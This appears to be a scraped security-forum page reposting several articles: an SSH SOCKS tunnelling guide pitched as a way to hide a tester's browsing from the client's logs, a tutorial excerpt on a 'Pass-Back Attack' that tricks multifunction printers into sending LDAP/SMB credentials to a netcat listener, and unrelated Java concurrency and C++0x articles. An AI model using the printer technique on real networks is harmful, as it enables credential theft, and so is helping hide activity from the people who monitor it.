  21. SSH Tunneling on Windows Easy-breezy but necessary to bypass the prying eyes of customers sometimes. When you’re on an internal test you don’t want them to see you googling how to hack thier network in their logs! Setup Putty for SSH Tunnel (Reason: sets up loopback port (7070) on your local PC and connects over port 22 to the remote shell): Session: user@yourserver.com:22 Connection>SSH: V2, Enable Compresion Connection>SSH>Tunnels>Source: 7070, Dynamic, ADD Session: Save, Open or on *nix or cygwin, create an SSH tunnel via command line: ssh -D 7070 -p 22 user@yourserver.com sleep 9999 Setup Firefox to encrypt to use the tunnel: Tools > Options > Network > Settings > Manual Socks: 127.0.0.1: 7070 click ok Setup Firefox to use Remote DNS (Reason: By default, your local PC will do the DNS by default, but that will show what websites you are going to, so this step sends DNS over the ssh tunnel) about:config network.proxy.socks_remote_dns=true Restart Browser Reason: configures firefox to route traffic through the tunnel you just made Test View everything is over port 22 View ip is different from whatismyip.com view filter in wireshark: dns, there should be no entries via digitalcrunch.com Sursa: http://www.securityaegis.com/ssh-tunneling-on-windows/
  22. Java concurrency Building and testing concurrent applications for the Java platform Date: 07 Oct 2011 (Published 23 Aug 2011) 1. Learn Java concurrency basics Threads and processes are the basic units of execution in concurrent Java programming. Every process has at least one thread, and all of the threads in a process share its resources. Understand the benefits of threads and why it's essential to use them safely. READ: Introduction to Java threads 2. Master high-level Java concurrency utilities Learn how to use the thread-safe, well-tested, high-performance concurrent building blocks in the java.util.concurrent package, introduced in Java SE 5. And find out how to avoid both common and lesser-known concurrency pitfalls. PRACTICE: Concurrency in JDK 5.0 READ: 5 things you didn't know about.. java.util.concurrent, Part 1 READ: 5 things you didn't know about ... java.util.concurrent, Part 2 READ: Java concurrency bug patterns for multicore systems 3. Test and analyze your concurrent code Take advantage of tools developed by IBM researchers for testing, debugging, and analyzing concurrent Java applications. DOWNLOAD: Java Thread Activity Analyzer(Free download) DOWNLOAD: IBM Lock Analyzer for Java(Free download) DOWNLOAD: IBM Thread and Monitor Dump Analyzer for Java(Free download) DOWNLOAD: Multicore Software Development Kit(Free download) DOWNLOAD: ConcurrentTesting - Advanced Testing for Multi-Threaded Applications(Free limited trial version) PRACTICE: Multithreaded unit testing with ConTest 4. Explore alternate concurrency models In response to advances in multicore processor hardware, approaches to writing concurrent applications for the Java platform are diversifying. Concurrency support in two alternate languages for the JVM — Scala and Clojure — eschew the thread model. Learn about the actor and agent concurrency in those languages, and about third-party Java and Groovy libraries that implement those models. And learn more about fork-join, a multicore-friendly concurrency enhancement in Java SE 7. LISTEN: Alex Miller talks concurrency READ: Explore Scala concurrency READ: Clojure and concurrency READ: Introducing Kilim: An actor framework for Java concurrency READ: Resolve common concurrency problems with GPars READ: Java theory and practice: Stick a fork in it Sursa: www.ibm.com/developerworks/training/kp/j-kp-concurrency/index.html
      • 1
      • Upvote
  23. Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers By Deral (PercX) Heiland and Michael (omi) Belton At Defcon 19 during my presentation we discussed a new attack method against printers. This attack method involved tricking the printer into passing LDAP or SMB credential back to attacker in plain text. We refer to this attack as a Pass-Back-Attack . So its been awhile, but we wanted to release a short tutorial discussing how this attack is performed. Over the past year, one focus of the Foofus.NET team involves developing and testing attacks against a number of Multifunction Printer (MFP) devices. A primary goal of this research is to demonstrate the effect of trust relationships between devices that are generally considered benign, and critical systems such as Microsoft Windows Domains. One of the most interesting attacks developed during this project is what we refer to as a Pass-Back Attack. A Pass-Back Attack is an attack where we direct an MFP device into authenticating (LDAP or SMB authentication) against a rogue system rather than the expected server. In the following sections we will step through the entire process of a Pass-Back-Attack using a Ricoh Aficio MP 5001 as our target device. This attack has been found to work on a number of Ricoh or rebranded Ricoh systems. Additionally, this attack works against a large number of MFP devices manufactured by Sharp. We expect there are many other devices that this attack will work against. This attack will be performed using a web browser, Netcat and a web proxy. First, we need to create a rogue listener that will be used to capture the authentication process initiated from the MFP. This is a relatively easy problem to solve; we can simply setup a listener using Netcat. $ nc -l 1389 In this attack we will use port 1389. If you’re reading this, you’re probably well aware that binding to a privileged port requires some form of administrative account such as “root.” We prefer non-privileged ports for this attack because they allow us to demonstrate how unprivileged access on one system can be used to gain privileged access to another system. A demonstration of this involves a scenario where you have remote (user-level) access to a device on a filtered subnet and are looking to gain more privileged access to a wider set of systems. Additionally, this approach highlights the fact that LDAP can be configured to authenticate against any software listening on any port. Download: http://www.foofus.net/~percX/praeda/pass-back-attack.pdf Sursa: http://www.foofus.net/?p=468
  24. Static code analysis and the new language standard C++0x April 14, 2010 9:00 PM PDT Abstract Introduction 1. auto 2. decltype 3. R-value reference 4. Right angle brackets 5. Lambdas 6. Suffix return type syntax 7. static_assert 8. nullptr 9. New standard classes 10. New trends in development of static code analyzers Summary References Abstract The article discusses the new capabilities of C++ language described in the standard C++0x and supported in Visual Studio 2010. By the example of PVS-Studio we will see how the changes in the language influence static code analysis tools. Introduction The new C++ language standard is about to come into our life. They are still calling it C++0x, although its final name seems to be C++11. The new standard is partially supported by modern C++ compilers, for example, Intel C++ and Visual C++. This support is far from being full-fledged and it is quite clear why. First, the standard has not been accepted yet, and second, it will take some time to introduce its specifics into compilers even when it is accepted. Compiler developers are not the only ones for whom support of the new standard is important. The language innovations must be quickly provided with support in static source code analyzers. It is promised that the new standard will provide backward compatibility. The obsolete C++ code is almost guaranteed to be able to be correctly compiled by new compilers without any modifications. But it does not mean that a program that does not contain new language constructs still can be processed by a static analyzer that does not support the new standard C++0x. We got convinced of it in practice when trying to check a project created in the beta-version of Visual Studio 2010 with PVS-Studio. The point is about the header files that already use the new language constructs. For example, you may see that the header file "stddef.h" uses the new operator decltype: namespace std { typedef decltype(__nullptr) nullptr_t; } Such constructs are naturally considered syntactically wrong by an analyzer that does not support C++0x, and either cause a program abort or incorrect results. It got obvious that we must provide support for C++0x in PVS-Studio by the moment Visual Studio is released, at least to the extent it is done in this compiler. We may say that we have fulfilled this task with success, and by the moment of writing this article, the new version PVS-Studio 3.50, integrating both into Visual Studio 2005/2008 and Visual Studio 2010, has become available on our site. Beginning with the version PVS-Studio 3.50, the tool provides support for the same part of C++0x standard as in Visual Studio 2010. This support is not perfect as, for example, in case of "right-angle brackets", but we will continue the work on developing the support for C++0x standard in the next versions. In this article, we will study the new features of the language which are supported in the first edition of Visual Studio 2010. We will look at these features from different viewpoints: what this or that new ability is about, if there is a relation to 64-bit errors, how the new language construct is supported in PVS-Studio and how its appearance impacts the library VivaCore. Note. VivaCore is a library of code parsing, analysis and transformation. VivaCore is an open-source library that supports the languages C and C++. The product PVS-Studio is based on VivaCore as well as other program projects may be created relying on this library. The article we want to present may be called a report on the investigation and support of the new standard in PVS-Studio. The tool PVS-Studio diagnoses 64-bit and parallel OpenMP errors. But since the topic of moving to 64-bit systems is more relevant at the moment, we will mostly consider examples that show how to detect 64-bit errors with PVS-Studio. 1. auto Like in C, the type of a variable in C++ must be defined explicitly. But with the appearance of template types and techniques of template metaprogramming in C++ language, it became usual that the type of an object is not so easy to define. Even in a rather simple case - when searching for array items - we need to define the type of an iterator in the following way: for (vector<int>::iterator itr = myvec.begin(); itr != myvec.end(); ++itr) Such constructs are very long and cumbersome. To make the record briefer, we may use typedef but it will spawn new entities and do little for the purpose of convenience. C++0x offers its own technique to make this issue a bit less complicated. The meaning of the key word auto is replaced with a different one in the new standard. While auto has meant before that a variable is created in the stack, and it was implied if you had not specified otherwise (for example, register), now it is analogous to var in C# 3.0. The type of a variable defined as auto is determined by the compiler itself relying on what object initializes this variable. We should notice that an auto-variable cannot store values of different types during one instance of program execution. C++ still remains a statically typed language, and by using auto we just tell the compiler to see to defining the type on its own: once the variable is initialized, its type cannot be changed. Now the iterator can be defined in this way: for (auto itr = myvec.begin(); itr != myvec.end(); ++itr) Besides mere convenience of writing the code and its simplification, the key word auto makes the code safer. Let us consider an example where auto will be used to make the code safe from the viewpoint of 64-bit software development: bool Find_Incorrect(const string *arrStr, size_t n) { for (size_t i = 0; i != n; ++i) { unsigned n = arrStr[i].find("ABC"); if (n != string::npos) return true; } return false; }; This code has a 64-bit error: the function behaves correctly when compiling the Win32 version and fails when the code is built in the Win64 mode. The error is in using the type unsigned for the variable "n", although the type string::size_type must be used which is returned by the function find(). In the 32-bit program, the types string::size_type and unsigned coincide and we get correct results. In the 64-bit program, string::size_type and unsigned do not coincide any more. When the substring is not found, the function find() returns the value string::npos that equals 0xFFFFFFFFFFFFFFFFui64. This value is cut to the value 0xFFFFFFFFu and placed into a 32-bit variable. As a result, the condition 0xFFFFFFFFu != 0xFFFFFFFFFFFFFFFFui64 is true and we have the situation when the function Find_Incorrect always returns true. In this example, the error is not so dangerous because it is detected even by the compiler not to speak of a specialized analyzer Viva64 (included into PVS-Studio). This is how the compiler detects the error: warning C4267: 'initializing' : conversion from 'size_t' to 'unsigned int', possible loss of data This is how Viva64 does it: V103: Implicit type conversion from memsize to 32-bit type. What is most important, this error is quite possible and often occurs in code due to inaccurate choice of a type to store the returned value. The error might appear even because the programmer is reluctant to use a cumbersome construct of the string::size_type kind. Now we can easily avoid such errors without overloading the code. Using the type auto, we may write the following simple and safe code: auto n = arrStr[i].find("ABC"); if (n != string::npos) return true; The error disappeared by itself. The code has not become more complicated or less effective. Here is the conclusion - it is reasonable in many cases to use auto. The key word auto will reduce the number of 64-bit errors or let you eliminate them with more grace. But auto does not in itself guarantee that all the 64-bit errors will be eliminated! It is just one more language tool that serves to make programmers' life easier but not to take all their work of managing the types. Consider this example: void *AllocArray3D(int x, int y, int z, size_t objectSize) { int size = x * y * z * objectSize; return malloc(size); } The function must calculate the array's size and allocate the necessary memory amount. It is logical to expect that this function will be able to allocate the necessary memory amount for the array of the size 2000*2000*2000 of double type in the 64-bit environment. But the call of the "AllocArray3D(2000, 2000, 2000, sizeof(double));" kind will always return NULL, as if it is impossible to allocate such an amount of memory. The true reason for this is the overflow in the expression "int size = x * y * z * sizeof(double)". The variable size takes the value -424509440 and the further call of the function malloc is senseless. By the way, the compiler will also warn that this expression is unsafe: warning C4267: 'initializing' : conversion from 'size_t' to 'int', possible loss of data Relying on auto, an inaccurate programmer may modify the code in the following way: void *AllocArray3D(int x, int y, int z, size_t objectSize) { auto size = x * y * z * objectSize; return (double *)malloc(size); } But it will not eliminate the error at all and will only hide it. The compiler will not generate a warning any more but the function AllocArray3D will still return NULL. The type of the variable size will automatically turn into size_t. But the overflow occurs when calculating the expression "x * y * z". This subexpression has the type int at first and only then it will be extended to size_t when being multiplied by the variable "objectSize". Now this hidden error may be found only with the help of Viva64 analyzer: V104: Implicit type conversion to memsize type in an arithmetic expression. The conclusion - you must be attentive even if you use auto. Let us now briefly look how the new key word is supported in the library VivaCore the static analyzer Viva64 is based on. So, the analyzer must be able to understand that the variable AA has the type int to warn (see V101) the programmer about an extension of the variable AA to the type size_t: void Foo(int X, int Y) { auto AA = X * Y; size_t BB = AA; //V101 } First of all, a new table of lexemes was composed that included the new C++0x key words. This table is stored in the file Lex.cc and has the name tableC0xx. To avoid modifying the obsolete code responsible for processing the lexeme "auto" (tkAUTO), it got the name tkAUTOcpp0x in this table. With the appearance of the new lexeme, the following functions were modified: isTypeToken, optIntegralTypeOrClassSpec. A new class LeafAUTOc0xx appeared. TypeInfoId has a new object class - AutoDecltypeType. To code the type auto, the letter 'x' was chosen and it was reflected in the functions of the classes TypeInfo and Encoding. These are, for example, such functions as IsAutoCpp0x, MakePtree. These corrections let you parse the code with the key word auto that has a new meaning and save the type of objects in the coded form (letter 'x'). But this does not let you know what type is actually assigned to the variable. That is, VivaCore lacks the functionality that would let you make sure that the variable AA in the expression "auto AA = X * Y" will have the type int. This functionality is implemented in the source code of Viva64 and cannot be integrated into the code of VivaCore library. The implementation principle lies in additional work of calculating the type in TranslateAssignInitializer method. After the right side of the expression is calculated, the association between the (Bind) name of the variable and the type is replaced with another. FULL article: http://software.intel.com/en-us/articles/static-code-analysis-and-the-new-language-standard-c0x/
  25. No 'Concepts' in C++0x Overload Journal #92 - August 2009 Author: Bjarne Stroustrup There have been some major decisions made about the next C++ Standard. Bjarne Stroustrup explains what's changed and why. At the July 2009 Frankfurt meeting of the ISO C++ Standards Committee (WG21) [iSO], the 'concepts' mechanism for specifying requirements for template arguments was 'decoupled' (my less-diplomatic phrase was 'yanked out'). That is, 'concepts' will not be in C++0x or its standard library. That - in my opinion - is a major setback for C++, but not a disaster; and some alternatives were even worse. I have worked on 'concepts' for more than seven years and looked at the problems they aim to solve much longer than that. Many have worked on 'concepts' for almost as long. For example, see (listed in chronological order): Bjarne Stroustrup and Gabriel Dos Reis: 'Concepts - Design choices for template argument checking'. October 2003. An early discussion of design criteria for 'concepts' for C++. [stroustrup03a] Bjarne Stroustrup: 'Concept checking - A more abstract complement to type checking'. October 2003. A discussion of models of 'concept' checking. [stroustrup03b] Bjarne Stroustrup and Gabriel Dos Reis: 'A concept design' (Rev. 1). April 2005. An attempt to synthesize a 'concept' design based on (among other sources) N1510, N1522, and N1536. [stroustrup05] Jeremy Siek et al.: Concepts for C++0x. N1758==05-0018. May 2005. [siek05] Gabriel Dos Reis and Bjarne Stroustrup: 'Specifying C++ Concepts'. POPL06. January 2006. [Reis06] Douglas Gregor and Bjarne Stroustrup: Concepts. N2042==06-0012. June 2006. The basis for all further 'concepts' work for C++0x. [Gregor06a] Douglas Gregor et al.: Concepts: Linguistic Support for Generic Programming in C++. OOPSLA'06, October 2006. An academic paper on the C++0x design and its experimental compiler ConceptGCC. [Gregor06b] Pre-Frankfurt working paper (with 'concepts' in the language and standard library): 'Working Draft, Standard for Programming Language C++'. N2914=09-0104. June 2009. [Frankfurt09] B. Stroustrup: Simplifying the use of concepts. N2906=09-0096. June 2009. [stroustrup09] It need not be emphasized that I and others are quite disappointed. The fact that some alternatives are worse is cold comfort and I can offer no quick and easy remedies. Please note that the C++0x improvements to the C++ features that most programmers see and directly use are unaffected. C++0x will still be a more expressive language than C++98, with support for concurrent programming, a better standard library, and many improvements that make it significantly easier to write good (i.e., efficient and maintainable) code. In particular, every example I have ever given of C++0x code (e.g., in 'Evolving a language in and for the real world: C++ 1991-2006' [stroustrup07] at ACM HOPL-III [HOPL]) that does not use the keywords 'concept' or 'requires' is unaffected. See also my C++0x FAQ [FAQ]. Some people even rejoice that C++0x will now be a simpler language than they had expected. 'Concepts' were to have been the central new feature in C++0x for putting the use of templates on a better theoretical basis, for firming-up the specification of the standard library, and a central part of the drive to make generic programming more accessible for mainstream use. For now, people will have to use 'concepts' without direct language support as a design technique. My best scenario for the future is that we get something better than the current 'concept' design into C++ in about five years. Getting that will take some serious focused work by several people (but not 'design by committee'). What happened? 'Concepts', as developed over the last many years and accepted into the C++0x working paper in 2008, involved some technical compromises (which is natural and necessary). The experimental implementation was sufficient to test the 'conceptualized' standard library, but was not production quality. The latter worried some people, but I personally considered it sufficient as a proof of concept. My concern was with the design of 'concepts' and in particular with the usability of 'concepts' in the hands of 'average programmers'. That concern was shared by several members. The stated aim of 'concepts' was to make generic programming more accessible to most programmers [stroustrup03a], but that aim seemed to me to have been seriously compromised: Rather than making generic programming more accessible, 'concepts' were becoming yet another tool in the hands of experts (only). Over the last half year or so, I had been examining C++0x from a user's point of view, and I worried that even use of libraries implemented using 'concepts' would put new burdens on programmers. I felt that the design of 'concepts' and its use in the standard library did not adequately reflect our experience with 'concepts' over the last few years. Then, a few months ago, Alisdair Meredith (an insightful committee member from the UK) and Howard Hinnant (the head of the standard library working group) asked some good questions relating to who should directly use which parts of the 'concepts' facilities and how. That led to a discussion of usability involving many people with a variety of concerns and points of view; and I eventually - after much confused discussion - published my conclusions [stroustrup09]. To summarize and somewhat oversimplify, I stated that: 'Concepts' as currently defined are too hard to use and will lead to disuse of 'concepts', possibly disuse of templates, and possibly to lack of adoption of C++0x. A small set of simplifications [stroustrup09] can render 'concepts' good-enough-to-ship on the current schedule for C++0x or with only a minor slip. That's pretty strong stuff. Please remember that standards committee discussions are typically quite polite, and since we are aiming for consensus, we tend to avoid direct confrontation. Unfortunately, the resulting further (internal) discussion was massive (hundreds of more and less detailed messages) and confused. No agreement emerged on what problems (if any) needed to be addressed or how. This led me to order the alternatives for a presentation in Frankfurt: 'fix and ship' Remaining work: remove explicit 'concepts', add explicit refinement, add 'concept'/type matching, handle 'concept' map scope problems Risks: no implementation, complexity of description Schedule: no change or one meeting 'Yank and ship' Remaining work: yank (core and standard library) Risks: old template problems remain, disappointment in 'progressive' community ('seven year's work down the drain') Schedule: five years to 'concepts' (complete redesign needed) or never 'Status quo' Remaining work: details Risks: unacceptable programming model, complexity of description (alternative view: none) Schedule: no change I and others preferred the first alternative ('fix and ship') and considered it feasible. However, a large majority of the committee disagreed and chose the second alternative ('yank and ship', renaming it 'decoupling'). In my opinion, both are better than the third alternative ('status quo'). My interpretation of that vote is that given the disagreement among proponents of 'concepts', the whole idea seemed controversial to some, some were already worried about the ambitious schedule for C++0x (and, unfairly IMO, blamed 'concepts'), and some were never enthusiastic about 'concepts'. Given that, 'fixing concepts' ceased to be a realistic option. Essentially, all expressed support for 'concepts', just 'later' and 'eventually'. I warned that a long delay was inevitable if we removed 'concepts' now because in the absence of schedule pressures, essentially all design decisions will be re-evaluated. Surprisingly (maybe), there were no technical presentations and discussions about 'concepts' in Frankfurt. The discussion focused on timing and my impression is that the vote was decided primarily on timing concerns. Please don't condemn the committee for being cautious. This was not a 'Bjarne vs. the committee fight', but a discussion trying to balance a multitude of serious concerns. I and others are disappointed that we didn't take the opportunity of 'fix and ship', but C++ is not an experimental academic language. Unless members are convinced that the risks for doing harm to production code are very low, they must oppose. Collectively, the committee is responsible for billions of lines of code. For example, lack of adoption of C++0x or long-term continued use of unconstrained templates in the presence of 'concepts' would lead to a split of the C++ community into separate sub-communities. Thus, a poor 'concept' design could be worse than no 'concepts'. Given the choice between the two, I too voted for removal. I prefer a setback to a likely disaster. Technical issues The unresolved issue about 'concepts' focused on the distinction between explicit and implicit 'concept' maps (see [stroustrup09]): Should a type that meets the requirements of a 'concept' automatically be accepted where the 'concept' is required (e.g. should a type X that provides +, -, *, and / with suitable parameters automatically match a 'concept' C that requires the usual arithmetic operations with suitable parameters) or should an additional explicit statement (a 'concept' map from X to C) that a match is intentional be required? (My answer: Use automatic match in almost all cases). Should there be a choice between automatic and explicit 'concepts' and should a designer of a 'concept' be able to force every user to follow his choice? (My answer: All 'concepts' should be automatic). Should a type X that provides a member operation X::begin() be considered a match for a 'concept' C<T> that requires a function begin(T) or should a user supply a 'concept' map from T to C? An example is std::vector and std::Range. (My answer: It should match). The answers 'status quo before Frankfurt' all differ from my suggestions. Obviously, I have had to simplify my explanation here and omit most details and most rationale. I cannot reenact the whole technical discussion here, but this is my conclusion: In the 'status quo' design, 'concept' maps are used for two things: To map types to 'concepts' by adding/mapping attributes To assert that a type matches a 'concept'. Somehow, the latter came to be seen an essential function by some people, rather than an unfortunate rare necessity. When two 'concepts' differ semantically, what is needed is not an assertion that a type meets one and not the other 'concept' (this is, at best, a workaround - an indirect and elaborate attack on the fundamental problem), but an assertion that a type has the semantics of the one and not the other 'concept' (fulfills the axiom(s) of the one and not the other 'concept'). For example, the STL input iterator and forward iterator have a key semantic difference: you can traverse a sequence defined by forward iterators twice, but not a sequence defined by input iterators; e.g., applying a multi-pass algorithm on an input stream is not a good idea. The solution in 'status quo' is to force every user to say what types match a forward iterator and what types match an input iterator. My suggested solution adds up to: If (and only if) you want to use semantics that are not common to two 'concepts' and the compiler cannot deduce which 'concept' is a better match for your type, you have to say which semantics your type supplies; e.g., 'my type supports multi-pass semantics'. One might say, 'When all you have is a 'concept' map, everything looks like needing a type/'concept' assertion.' At the Frankfurt meeting, I summarized: Why do we want 'concepts'? To make requirement on types used as template arguments explicit Precise documentation Better error messages Overloading Different people have different views and priorities. However, at this high level, there can be confusion - but little or no controversy. Every half-way reasonable 'concept' design offers that. What concerns do people have? Programmability Complexity of formal specification Compile time Run time My personal concerns focus on 'programmability' (ease of use, generality, teachability, scalability) and the complexity of the formal specification (40 pages of standards text) is secondary. Others worry about compile time and run time. However, I think the experimental implementation (ConceptGCC [Gregor06b]) shows that run time for constrained templates (using 'concepts') can be made as good as or better than current unconstrained templates. ConceptGCC is indeed very slow, but I don't consider that fundamental. When it comes to validating an idea, we hit the traditional dilemma. With only minor oversimplification, the horns of the dilemma are: 'Don't standardize without commercial implementation' 'Major implementers do not implement without a standard' Somehow, a detailed design and an experimental implementation have to become the basis for a compromise. My principles for 'concepts' are: Duck typing The key to the success of templates for GP (compared to OO with interfaces and more). Substitutability Never call a function with a stronger precondition than is 'guaranteed'. 'Accidental match' is a minor problem Not in the top 100 problems. My 'minimal fixes' to 'concepts' as present in the pre-Frankfurt working paper were: 'Concepts' are implicit/auto To make duck typing the rule. Explicit refinement To handle substitutability problems. General scoping of 'concept' maps To minimize 'implementation leakage'. Simple type/'concept' matching To make vector a range without redundant 'concept' map For details, see [stroustrup09]. No C++0x, long live C++1x Even after cutting 'concepts', the next C++ standard may be delayed. Sadly, there will be no C++0x (unless you count the minor corrections in C++03). We must wait for C++1x, and hope that 'x' will be a low digit. There is hope because C++1x is now feature complete (excepting the possibility of some national standards bodies effectively insisting on some feature present in the formal proposal for the standard). 'All' that is left is the massive work of resolving outstanding technical issues and comments. A list of features and some discussion can be found on my C++0x FAQ [FAQ]. Here is a subset: atomic operations auto (type deduction from initializer) C99 features enum class (scoped and strongly typed enums) constant expressions (generalized and guaranteed; constexpr) defaulted and deleted functions (control of defaults) delegating constructors in-class member initializers inherited constructors initializer lists (uniform and general initialization) lambdas memory model move semantics; see rvalue references null pointer (nullptr) range for statement raw string literals template alias thread-local storage (thread_local) unicode characters uniform initialization syntax and semantics user-defined literals variadic templates and libraries: improvements to algorithms containers duration and time_point function and bind forward_list a singly-liked list future and promise garbage collection ABI hash_tables; see unordered_map metaprogramming and type traits random number generators regex a regular expression library scoped allocators smart pointers; see shared_ptr, weak_ptr, and unique_ptr threads atomic operations tuple Even without 'concepts', C++1x will be a massive improvement on C++98, especially when you consider that these features (and more) are designed to interoperate for maximum expressiveness and flexibility. I hope we will see 'concepts' in a revision of C++ in maybe five years. Maybe we could call that C++1y or even 'C++y!' References [FAQ] Bjarne Stroustrup, 'C++0x - the next ISO C++ standard' (FAQ), available from: C++11 FAQ [Frankfurt09] 'Working Draft, Standard for Programming Language C++', a pre-Frankfurt working paper, June 2009, available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2914.pdf [Gregor06a] Douglas Gregor and Bjarne Stroustrup, June 2006, 'Concepts', availabe from: http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2006/n2042.pdf [Gregor06b] Douglas Gregor, Jaakko Jarvi, Jeremy Siek, Bjarne Stroustrup, Gabriel Dos Reis and Andrew Lumsdaine, October 2006, 'Concepts: Linguistic support for generic programming in C++', available from: http://www.research.att.com/~bs/oopsla06.pdf [HOPL] Proceedings of the History of Programming Languages conference 2007, available from: http://portal.acm.org/toc.cfm?id=1238844 [iSO] The C++ Standards Committee - ISO/IEC JTC1/SC22/WG21 - The C++ Standards Committee [Reis06] Gabriel Dos Reis and Bjarne Stroustrup, January 2006, 'Specifying C++ concepts', available from: http://www.research.att.com/~bs/popl06.pdf [siek05] Jeremy Siek, Douglas Gregor, Ronald Garcia, Jeremiah Willcock, Jaakko Jarvi and Andrew Lumsdaine, May 2005, 'Concepts for C++0x', available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1758.pdf [stroustrup03a] Bjarne Stroustrup and Gabriel Dos Reis, October 2003, 'Concepts - Design choices for template argument checking', available from: http://www.research.att.com/~bs/N1522-concept-criteria.pdf [stroustrup03b] Bjarne Stroustrup, October 2003, 'Concept checking - A more abstract complement to type checking', available from: http://www.research.att.com/~bs/n1510-concept-checking.pdf [stroustrup05] Bjarne Stroustrup and Gabriel Dos Reis, April 2005, 'A concept design (Rev. 1)' available from:http://www.research.att.com/~bs/n1782-concepts-1.pdf [stroustrup07] Bjarne Stroustrup, May 2007, 'Evolving a language in and for the real world: C++ 1991-2006', available from: http://www.research.att.com/~bs/hopl-almost-final.pdf [stroustrup09] Bjarne Stroutstrup 'Simplifying the use of concepts'. Available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2906.pdf -------------------------------------------------------------------- Sursa: ACCU :: No 'Concepts' in C++0x
×
×
  • Create New...